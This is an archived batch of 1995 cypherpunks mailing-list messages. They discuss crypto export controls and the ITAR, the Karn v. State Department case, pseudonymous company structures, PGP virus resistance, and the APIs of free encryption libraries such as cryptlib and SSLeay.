From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 21 Nov 1995 11:28:25 +0800
To: cypherpunks@toad.com
Subject: Happy Thanksgiving L. Detweiller!
Message-ID: <199511210254.TAA12709@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


And to all of your tentacles,

And to all of you on The Cypherpunk List.

Love Always,

Carol Anne
ps Is that L for Laura or Lori?
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Tue, 21 Nov 1995 22:32:03 +0800
To: privacy@vortex.com
Subject: Applied Cryptography case filings on the Web
Message-ID: <199511210500.VAA01678@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


The government has filed its Motion to Dismiss, or In The Alternative,
For Summary Judgment in the case of Karn vs State Dept. This case
challenges the arbitrary Commodity Jurisdiction Request rulings
made for the book Applied Cryptography and for a floppy disk containing
the same source code printed in the book.

I've begun scanning in and HTMLizing the various government documents,
some of which are sizeable. As I finish them I'm putting them up on
my web page. Please feel free to pass around this URL:

http://www.qualcomm.com/people/pkarn/export/index.html

--Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 21 Nov 1995 04:45:51 +0800
To: cypherpunks@toad.com
Subject: Spam the Sign!
Message-ID: <199511202020.VAA01688@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On September 27, Jeff Weinstein of Netscape (and others) wrote:

> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> > > hint).
> > 
> > We are working this issue with the government.  As soon as we can
> > make it available for download we will.

> In other words, we will never see it in our lifetimes -- the
> bureaucreeps aren't known for promoting the spread of strong crypto.

>>  Where did I imply that if the govt. ignored us or said no that we
>>  would meekly go away with tail between legs?

Netscape has a cute little Times Square scrolling sign in their engineering
dept. - you can leave a message for all to see at:

	www.netscape.com/people/mtoy/sign/index.html

Drop by and ask Jeff where his tail is these days. };->




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Tue, 21 Nov 1995 03:46:57 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
Message-ID: <pnr747988188m@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In message <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>, s1113645@tesla.cc.uottawa.ca said:
> On Sat, 18 Nov 1995, David Murray wrote:
> 
> > unincorporated, or deed of settlement, company.
> 
...
 
> Barring escrow services, I don't see how contracts (or a lot of 
> other laws) could be enforced against these entities when they can simply pop
> in and out of existence (unless they have some physical counterpart, like 
> a storefront and merchandise. But then these are easily linkable to True 
> Names, unlike software companies, financial services or any other part of 
> the info economy.)

But the assets of the company are held by (known) trustees and exposed to
judgment - the pseudonymous part just means that _only_ those assets are
exposed.

For instance, an enterprising cypherpunk decides it would be a good thing
to run a restaurant with a crypto-anarchy theme (cajun style Blacknet burgers,
anonymous avocado salad, Phil Zimmerman celebrity cocktail...). Unaccountably,
a thousand other cypherpunks decide to invest $100 each. More understandably,
they don't want it to be known that they invested. By buying shares in an
unincorporated company pseudonymously (including anonymously) they can risk
$100, but $100 only. The money is (initially) held in the trustee's bank
account (having been subscribed in ecash), so the cheques for the tables and
chairs won't bounce. The chairs, tables, kitchen equipment, lease etc will
also be held by the trustee on trust for the partnership/company, and will
be available for creditors should the partnership not meet its obligations.

So doing business with an unincorporated company is very much like doing
business with an incorporated company/corporation. (I can see that audited
accounts, for instance, could be useful in attracting investors/reassuring
creditors.)

Note that the argument works just as well for intangible assets - even digital
assets - as for tangible ones like tables. So our enterprising cypherpunk
might well have started a bank, insurance company or mutual fund (except for
all the other regulatory hassles :-)
  
> Besides, if companies in general can set up other companies, in a 
> trustworthy and non-anon jurisdiction, couldn't these foreign anon companies 
> do the same in the present system and therefore make it very hard to know 
> if any company in any country is non-anon?

Yes. But you have to have your base anon corporation to be the penultimate
stockholder of the other corporations. And it can be expensive - perhaps too
expensive to be worth the gain in anonymity. There is also the matter of having
to have human directors with revealed True Names in most non-anon and
"trustworthy" jurisdictions.

There are other ways to anonymise corporations - I presented a proposal to the
list about a year ago that simply interposed a unit-like trust as sole (legal)
shareholder of the corporation, the "units" in the trust mirroring the shares
but being held anonymously.

Any of these structures can/might be useful. What I like about unincorporated
companies, however, is the way they rely only on the common law and equity,
and bypass statute - enabling, perhaps, less reliance upon the law of any
particular State.

> I'm not completely sure I understood your explanation of a 
> deed-of-settlement corp. and the idea of an "unincorporated" company. 
                     ^^^^^
Not "corporation", "company", as in collective noun :-) An incorported company
is a corporation, but in general, company ~= corporation. It is just that for
well over a hundred years there have not been any companies that have _not_
been incorporated, except dance companies, infantry companies etc.
   
> (Unincorporated in what way, and what were the registration and ID 
> requirements?)

Unincorporated in every way :-) Which is to say, not a seperate legal entity
but a partnership (of shareholders) coupled with a trust of the partnership
assets.

And because it relies only on partnership/agency/contract law and the law of
trusts, there were no registration or ID requirements, just as there are no
registration or ID requirements for forming a partnership or trust now.
 
(Compare, for instance, the requirement on NZ incorporated companies to keep
public records of the name and [in the case of natural persons, residential]
address of everyone who has been a shareholder in the last ten years.)

> Any references? Thanks.

A lot of Corporate/Company law books have some coverage of this stuff in their
historical chapters - try English or Australian texts (Gower is quite good).
Legal history texts also often have something. Du Bois published a book (in
the 1940's ?) that seems to be cited for all manner of minutiae - it has
something about the Bubble Act in its (long) title. [If you find this book,
how about sending me a summary :-) Chapter III is probably most useful.] And
J. Reeder "Corporate Loan Financing in the 17th and 18th Centuries" (1973) 2 Anglo-American Law Review 487 is supposed to have something about bond issues
by unincorporated companies (or is it bank lending?).

Cheers,

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLBKhllo3j8JHzalAQF/PQP7BWH7JGNNazI2ehSpOldEysa+FZbirHLs
hkbqOIFDJzBXtQ3lyiA1lZydMdDTxpNAF0oGveNosX6Sw3l23Hu/j+EGg7hOGLq3
IVchirf24/puj6HWwQbD9LlMB1SARNKkwG+0NI6saYz/z0JVHdtw7c6/dvoxcVZX
M/T8qjWddqs=
=wLPd
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 15:58:31 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
Message-ID: <199511210731.XAA08374@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995, Dr. Dimitri Vulis wrote:

> m5@dev.tivoli.com (Mike McNally) writes:
> > Frederick B. Cohen writes:
> >  > This is baloney.  When you work for Netscape or Sun and speak about
> >  > your company's products, you are representing the company whether you
> >  > disclaim it or not.
> >
> > Baloney.
>
> Fred is right. I used to work for Goldman Sachs & their internet usage
> policy stated that when you write to Internet or Usenet from a GS account,
> it will reflect on the firm no matter how you disclaim it.

I think this is true, and is where we start to get into reputations and
trust. 

If someone from Goldman Sachs posts to a Usenet group discussing abortion
or gun-control, and says that: "These opinions are my own and not my
employers."  Then, we can accept that, no matter how silly their opinions
are. 

But there is a difference in the way we look at it if someone from Goldman
Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs
Strip Coupon Fund is better than the one from Merrill Lynch -- that it's
safer and produces higher returns because Goldman uses cubic spline
interpolation methodologies to interpolate the yield curve, while Merrill
Lynch doesn't.  There is a difference here. 

In the first case, the poster is not commenting about anything to do with
their work, -- it really is just one man's opinion -- while in the second
they are actually commenting upon something their employer is selling. 

If the employee tries to add, "these opinions are my own, and do not
reflect the opinion of my employer" then we have a huge credibility
problem. 

You really can't have it both ways.  You can't post officially and
unofficially at the same time, unless it really does have nothing to do
with your work. 

If you post from Sun Engineering, and you are posting to a group that
focuses on Sun, and you are talking about a Sun product, then people are
going to take your comments as an official statement from Sun. You are
that product's spokesperson, whether you disclaim or not, and should act
accordingly.  No matter what, that's the way people are going to see it. 

It's a huge responsibility ... it's not like speaking candidly at an open
Member's table at the Rideau Club or anything, like that. 

Sun and Netscape and AT&T should know this.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 21 Nov 1995 16:00:58 +0800
To: Thomas E Zerucha <zerucha@shell.portal.com>
Subject: Re: Virus attacks on PGP
Message-ID: <199511210732.XAA04912@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:52 11/20/95 -0800, Thomas E Zerucha wrote:
>... The code can also be cross compiled 
>and burned onto a CDROM which would make it difficult to infect.

Certainly having PGP run from a CDROM or other read-only device would be a
big help.  Even better would be to have all the privileged code also run
from a read-only device.


Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 21 Nov 1995 13:03:11 +0800
To: cypherpunks@toad.com
Subject: Export control FTP servers
Message-ID: <9511210441.AA26515@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
>and sed. I didn't get the NSA to approve it, but I figure if it's good
>enough for RSADSI it's good enough for me.

I believe some of the following has been posted here before.
The person to speak with is
	John Sonderman
	Office of Defense Trade
	Department of Compliance
	703 875 6644
He's supposed to be Internet-aware.   What's not common knowledge is
that he's leaving by early December for budgetary reasons.  If you're
thinking of putting export controlled stuff up for FTP, you should
probably contact John now.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 21 Nov 1995 17:28:37 +0800
To: attila@primenet.com (attila)
Subject: Re: Export control FTP servers
In-Reply-To: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
Message-ID: <199511210906.BAA04152@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


#!/bin/sh
umask 022
DIRNAME=`cat $HOME/.usonlydir`
NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
cd /u1/ftp/pub/US-only
mv I_will_not_export_$DIRNAME I_will_not_export_$NEWDIRNAME
cd ..
sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
mv README.new README.US-only
echo $NEWDIRNAME > $HOME/.usonlydir


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 19:48:10 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511210955.BAA16150@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 Nov 1995 hallam@w3.org wrote:


> I think it would be better to slap a RICO suit onto the company
> concerned. It sound to me like an attempt to gain financial advantage
> through threatening behaviour. Where I come from that means jail time. 

RICO is very serious stuff.  Criminal prosecution under the terms of the
Racketeer-Influenced & Corrupt Organizations Act is reserved for very
serious situations indeed.  It's true "rubber hose" stuff. 

It was intended as a tool for use against mobsters, but US attorneys have
used it against white-collar criminals.  I think, you'd have to have
strong evidence of an ongoing "criminal enterprise", which I don't think
you have with junk e-mail. 

I doubt that there are many experts in RICO as it applies to computer law. 

I really don't know if the laws pertaining to breaches of computer
security would be applicable, or not, or how RICO really does work or fit. 
Although the armchair solicitor in me might speculate that you'd have to
show some form of organized collusion or somesuch to breach computer or
network integrity to prosecute under RICO.  And you'd have to show -- I'm
uncertain if the standard is beyond a reasonable doubt or not -- that it
was at some point willful and well-organized. 

I suppose that is a moot point though, when we're talking about pre-trial
forfeiture of all assets -- right down to the food in the refrigerator.  I
doubt at that point that a trial would be forthcoming.  It really does
reinforce the maxim, that it's best not to fight a battle that you cannot
win.  

RICO is very persuasive that way. 

I'm certain that there will be those who would say that it's not
administratively possible to apply RICO to this situation.  Most legal
advisers would probably say that it can't be done, but I suppose then,
that would be the time for the clarion call, "Then get me a lawyer who
says it CAN be done." 

Personally, however, I'm unconvinced, and would defer to those much more
knowledgable in such matters.  

Although, in all honesty, RICO and computer networks in the same sentence
literally scares the be-jeebers outta me. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 21 Nov 1995 11:13:26 +0800
To: cypherpunks@toad.com
Subject: Detweiler and his theory of "Budding Nazism"
In-Reply-To: <199511202005.MAA25006@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951121015310.16797A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



 It probably is not worth the aggravation, but ignorant, both poltically and 
as to the charter of cypherpunks, assholes like Detweiler need to be set 
straight.  Since I doubt Detweiler is open to discussion --small minds 
rarely are, we might _very_ politely suggest to the editors of Time, NYT, 
and a couple others that Detweiler is not only misinformed, but that he 
is not open to discussion.  Enough _polite_ letters to the editors can do 
wonders.
________________________________________________________________________
On Mon, 20 Nov 1995, Hroller Anonymous Remailer wrote:

> The other anonymous poster was referring to Detweiler's
> belief that cryptoanarchy was a budding Nazism as one
> of his apparent motivations. After a little bit of 
> amateur Detweiler study I can agree with this. 
> 
> His page at http://www.csn.net/~ldetweil/ has sections that
> emphasize his concern about cryptoanarchy as a kind of
> "neo-nazism". Thankfully the cryptoanarchist sentiments
> on this list are much different than nazism in the way
> it advocates complete disengagement from the political
> process, something that tended to make the Nazist agenda
> highly dangerous. Without that you just have a bunch of
> subversive guerillas. Like gnats, irritating but irrelevant.
> 
> So as long as we stick with the non-political advocation,
> and stay disorganized, and don't ever amount to anything
> significant as far as visible political clout, I think
> Detweiler is generally going to continue to leave us alone,
> thank God.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 21 Nov 1995 20:46:35 +0800
To: ahupp@primenet.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511180319.UAA07399@usr5.primenet.com>
Message-ID: <199511210110.CAA00878@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> PKZIP allows encryption (other's ?).  How about a hook to that?

PKZIP "encryption" is self-deception.  A program for cracking it,
PKCRACK, is widely available on the internet.  See e.g.
ftp.funet.fi:/pub/crypt/analysis.  

[For information about internationally available cryptographic
software, see http://www.cs.hut.fi/crypto.]

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 20:41:06 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511211219.EAA10354@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Rich Salz wrote:

> >RICO is very serious stuff.  Criminal prosecution under the terms of the
> 
> Like Operation Rescue?

My apologies, I'm sorry but I don't understand this reference.  What does
Operation Rescue have to do with the seriousness of RICO?  What is
Operation Rescue? 

I am definitely not an expert on foreign statute.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 22:27:43 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
Message-ID: <199511211405.GAA17363@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

On Wed, 8 Nov 1995, Daniel R. Oelke,
 <droelke@aud.alcatel.com> wrote:

> > Now were getting specific. These are things that us ordinary folk can do
> > which show the 'leaders' how to follow. What software, hardware,
> > applications, support and sysadmin experience is required and where is it
> > available on what terms. What are the cash flow opportunities to support
> > such services? 

By "cash flow-opportunities", is this the "opportunity-cost" of providing
services??  The foregone profits of today.  Or is this the future cash
flow opportunities which could arise from this type of activity.  The
future assets of tomorrow? 

Essentially, doesn't all of this reduce to "valuing" in present dollar
terms (i.e.  attaching a discounted present value through some appropriate
hurdle rate) to some level of future benefit. 

The real issue as I see it, is finding some way to actually "fund" that 
hazy discounted present value.

> A good service would be to provide and support distribution of 
> of privacy enhancing tools to universities and companies that
> want them.  i.e. have people who will help set up firewalls,
> PGP, encrypted telnet (pick your flavor), etc. 

As long as it of course *obviously* excludes product like Netscape
Navigator -- the black-box code with significant security holes and flaws --
I'd have to agree that this is in fact a very good idea.

But it requires forward-thinking.  It's no different actually than paying 
someone for what they know, rather than paying them for what they do.

> Yes - I know that most of this stuff is out there already,
> but having people *willing* to integrate it for you without
> charging an arm and a leg would go a long way towards convincing the
> suits that this is a *good* thing.  

It sounds good on the surface.  In fact the liason officer / integrator
might even establish some valuable "working relationships".  I think that
this form of thinking is what will define who will be long term players in
this industry -- and who won't.  

Those who are able to build "goodwill" will survive and flourish, while
the others will flounder. 

If I may paraphrase, I believe that Dan is speaking possibly of
loss-leader services.  Services which do not in actuality show presently
as "high value-added" under our antiquated systems of accounting and
measurement.  Services which might in fact reduce short-term "profits"
because they are "current-expensed" rather than being recognized as the
deferred assets, they in fact truly are. 

(Essentially, the same problem we've visited with R&D expenses.  The
problem where the "solution" is defined as cutting R&D expense, so that
there is increased "profit", although long-term health and corporate
competitiveness is actually weakened.  A true management accounting
paradox.)

There should be a re-focus onto a horizon that is somewhat longer than the
current quarter.  Or the current day, for that matter, or the current
moment.  Unfortunately, these types of "forward-thinking" plans and
projects all require current funds.  Money.  And lots of it, before they
start showing and generating "measurable" returns.  It really is the
laying and strengthening of foundations. 

And who has the authority to spend any money on "wasteful" foundations??

If no one funds these types of projects, either jointly or individually, 
then these projects and bright ideas invariably go absolutely nowhere.


> Dan
> ------------------------------------------------------------------
> Dan Oelke                                  Alcatel Network Systems
> droelke@aud.alcatel.com                             Richardson, TX



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 21 Nov 1995 19:34:37 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <9511211114.AA26914@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>RICO is very serious stuff.  Criminal prosecution under the terms of the

Like Operation Rescue?

Wrong again, Alice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Tue, 21 Nov 1995 21:51:32 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511210732.XAA04912@netcom18.netcom.com>
Message-ID: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Certainly having PGP run from a CDROM or other read-only device would be a
> big help.  Even better would be to have all the privileged code also run
> from a read-only device.

Seeing as PGP is quite small the simplest and cheapest read-only device
would be a write-protected floppy disk.

Could a virus write to a write-protected disk?  I'm not sure if the
protection is done in the BIOS or the drive hardware.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 21 Nov 1995 23:21:03 +0800
To: rsalz@osf.org
Subject: Re: Get your own ITAR
Message-ID: <9511211457.AA03654@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



I just called this number and was given the following instructions:
Fax your request to (703)875-6647 Attn Donna Davis, include your name 
and address. Allow 10-15 days for US mail or include your Fed-Ex 
account number for faster service.

Enjoy,
Dan
> 
>     1 703 875 6644.
> The kindly administrative assistant there will take your name and address
> and send you a hardcopy of the ITAR regulations.  I don't know about
> overseas mailings.  I also imagine you will have to wait until the current
> US budget stale-mate is resolved.  (Thanks to digest-reader walt@osf.org
> for the phone number.)
> 	/r$
> 

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 21 Nov 1995 17:24:19 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Export control FTP servers
In-Reply-To: <9511210441.AA26515@sulphur.osf.org>
Message-ID: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



well, since it is "official" policy and the basics concern rejecting all 
foreign addresses and making the proposed recipient agree to a file 
statement agreeing not to export and that he/she/it is an American or 
Canadian citizen, it might be nice if someone who has the `sed ....`
and/or `awk...` scripts would post them for all to use (with whatever 
disclaimers, etc.)

On Mon, 20 Nov 1995, Rich Salz wrote:

> >	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> >and sed. I didn't get the NSA to approve it, but I figure if it's good
> >enough for RSADSI it's good enough for me.
> 
> I believe some of the following has been posted here before.
> The person to speak with is
> 	John Sonderman
> 	Office of Defense Trade
> 	Department of Compliance
> 	703 875 6644
> He's supposed to be Internet-aware.   What's not common knowledge is
> that he's leaving by early December for budgetary reasons.  If you're
> thinking of putting export controlled stuff up for FTP, you should
> probably contact John now.
> 	/r$
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 21 Nov 1995 22:46:14 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
In-Reply-To: <199511211405.GAA17363@jobe.shell.portal.com>
Message-ID: <m0tHtcC-000G1LC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:
 > Alice here ...

How do we know this for a fact?

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | Neither is a good choice:
Potsdam, NY 13676 |  Abortion is murder; forced childbirth is slavery.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Tue, 21 Nov 1995 19:55:14 +0800
To: cypherpunks@toad.com
Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd)
Message-ID: <Pine.LNX.3.91.951121193458.8471B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


Found on sci.crypt, apparently not yet posted on this list. I haven't 
examined it at all, caveat emptor. The size of the ZIP file is about 148 Kb.

Enzo

---------- Forwarded message ----------
Path: news.hklink.net!hpg30a.csc.cuhk.hk!cuhknntp!news.uoregon.edu!cs.uoregon.edu!reuter.cse.ogi.edu!hp-cv!hp-pcd!sdd.hp.com!swrinde!newsfeed.internetmci.com!in1.uu.net!brighton.openmarket.com!decwrl!waikato!auckland.ac.nz!news
From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Newsgroups: alt.security,comp.security.misc,sci.crypt
Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows
Date: 20 Nov 1995 09:57:45 GMT
Organization: University of Auckland
Lines: 45
Sender: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Message-ID: <48pjep$7ge@net.auckland.ac.nz>
NNTP-Posting-Host: cs26.cs.auckland.ac.nz
X-Newsreader: NN version 6.5.0 #3 (NOV)
Xref: news.hklink.net alt.security:6498 comp.security.misc:5814 sci.crypt:6827


[This was announced a few days ago, I've reposted it to a few crypto and 
 security groups for people who don't read the archives groups]
 
File name: ftp://garbo.uwasa.fi/pc/security/cryptl99.zip
One line description: Free encryption library for Unix/DOS/Windows
 
This encryption library provides a universal interface to a number of 
conventional-key encryption algorithms.  The library currently supports 
encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, 
triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, 
CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB.  All encryption routines are 
accessed through a single standardised interface with parameters such as 
algorithm, mode and key size being selectable by the user.  The library is 
supplied as source code for Unix, DOS, and the Amiga, and as dynamic link 
libraries for Windows and Windows NT.
 
The design goal for the library was to create an easy-to-use, standardised 
interface to a number of popular encryption algorithms.  Like the standard C 
file I/O libraries which work with FILE objects, this library works with an 
"encryption context" of type CRYPT_INFO.  To encrypt data, you create an 
encryption context, load a user key into it, en/decrypt data, and destroy it 
when you've finished.  This concept lends itself to implementation either as a 
C++ class or as C routines.
 
The library has been written to be as idiot-proof as possible.  On 
initialization it performs extensive self-testing against test data from 
encryption standards documents, and the API's check each parameter and 
function call for errors before any actions are performed, with error 
reporting down to the level of individual parameters.
 
The library API serves as an interface to a range of plug-in encryption 
modules which allow encryption algorithms to be added in a fairly transparent 
manner.  The standardised API allows any of the algorithms and modes supported 
by the library to be used with a minimum of coding effort.  As such the main 
function of the library is to provide a standard, portable, easy-to-use 
interface between the underlying encryption routines and the user software.
 
All code is plain ANSI C, with no machine or OS-specific functions or calls 
being used.
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 21 Nov 1995 20:49:37 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd)
In-Reply-To: <Pine.LNX.3.91.951121193458.8471B-100000@ima.net>
Message-ID: <Pine.SOL.3.91.951121220824.2627A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Enzo Michelangeli wrote:
> This encryption library provides a universal interface to a number of 
> conventional-key encryption algorithms.  The library currently supports 
> encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, 
> triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, 
> CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB.  All encryption routines are 

:-) cute, the next version of SSLeay to be released will have the same 
thing, good to see great minds think alike (or is that simple minds 
seldom differ :-).

Currently the interface I will have is
EVP_EncryptInit(EVP_CIPHER_CTX *ctx,EVP_CIPHER *type,unsigned char *key,
	unsigned char *iv);
void EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl,
	unsigned char *in,int inl);
void EVP_EncryptFinal(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl);

with a string to bytes function,
int EVP_BytesToKey(EVP_CIPHER *type,EVP_MD *md,unsigned char *salt,
	unsigned char *data,int datal,int count,
	unsigned char *key,unsigned char *iv);

this is upward compatable with PKCS#5 and will generate a key and iv of 
the correct size depending on the EVP_CIPHER for a data string (the 
lengths are encoded in the EVP_CIPHER definition).
I also have all my Message digest routines using the same type of interface.

What makes this nice is that all my digital signature routines 
(open, seal, sign, verify etc) all take EVP_CIPHER and EVP_MD arguments 
so any cipher can be used and any MD can be used.  The ASN1 object 
identifiers are contained in the EVP_CIPHER/EVP_MD structures.

It also make the 'demo' program that supports all the above mentioned 
encryption modes (and also does base64 encoding/decoding) only 290 lines 
long :-).

Now, heres the rub, to use a cipher to encode in pkcs#7 (which is what
S/MIME is using) one needs to have an object identifier (for use in the
ASN1 encoding).  I know of very few object identifiers.

type			object identifier.
EVP_des_ecb		1 3 14 3 2 6
EVP_des_ede
EVP_des_ede3		1 2 840 113549 3 17 (or is this EVP_des_ede (2 keys))
EVP_des_cfb		1 3 14 3 2 9
EVP_des_ede_cfb
EVP_des_ede3_cfb
EVP_des_ofb		1 3 14 3 2 8
EVP_des_ede_ofb
EVP_des_ede3_ofb
EVP_des_cbc		1 3 14 3 2 7
EVP_des_ede_cbc
EVP_des_ede3_cbc
EVP_rc4			1 2 840 113549 3 4
EVP_idea_ecb
EVP_idea_cfb
EVP_idea_ofb
EVP_idea_cbc
MD_md2			1 2 840 113549 2 2
MD_md5			1 2 840 113549 2 5
MD_sha			1 3 14 3 2 18

Can anyone out there fill in the blanks?  I also supose the new version 
of SHA, SHA-1 will also have a different identifier as well which I will 
also need.

In the above, I always use 'ede' to refer to encrypt-decrypt-encrypt with 
2 keys and 'ede3' to refer to ede with three keys.

eric (on a quest for object identifiers... and to finish the next version
